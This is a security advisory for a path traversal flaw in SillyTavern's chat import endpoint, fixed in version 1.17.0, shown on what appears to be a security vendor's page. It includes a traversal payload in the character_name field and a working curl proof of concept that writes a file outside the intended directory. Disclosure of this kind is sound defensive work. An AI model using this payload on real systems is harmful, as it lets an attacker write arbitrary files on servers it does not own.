Launch Week Day 1: Announcing Security Design Review
Start for Free
HIGH 8.1 npm

SillyTavern has a path traversal in `/api/chats/import` allows arbitrary file write outside intended chat directory

GHSA-xvww-xhx6-22pf · CVE-2026-34522

Published · Modified

Description

Summary

A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into character_name.

Details

character_name is used unsafely as part of the destination filename and then passed into path.join(...) without sanitization.

Evidence:

Example payload:

  • character_name=../../../../tmp/st_poc

This causes the final destination path to escape from <user>/chats/<avatar>/... and write to an attacker-controlled location such as /tmp/... (or any writable path for the service account).

PoC

Prerequisites:

  • Valid authenticated session cookie (cookie.txt)
  • Valid CSRF token ($TOKEN)

Prepare payload:

printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl

Trigger arbitrary write:

curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
  -F "avatar=@/tmp/poc.jsonl" \
  -F "file_type=jsonl" \
  -F "avatar_url=a.png" \
  -F "character_name=../../../../tmp/st_poc" \
  -F "user_name=u" \
  http://TARGET:8000/api/chats/import

Observed result:

  • A file is created outside chats directory, for example:
    /tmp/st_poc - <timestamp> imported.jsonl

Impact

  • Integrity: attacker can create files in unintended filesystem locations.
  • Availability: can be used for disk abuse and disruptive file placement.
  • Can become more severe when chained with other local processing behaviors.

Resolution

The issue was addressed in version 1.17.0

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes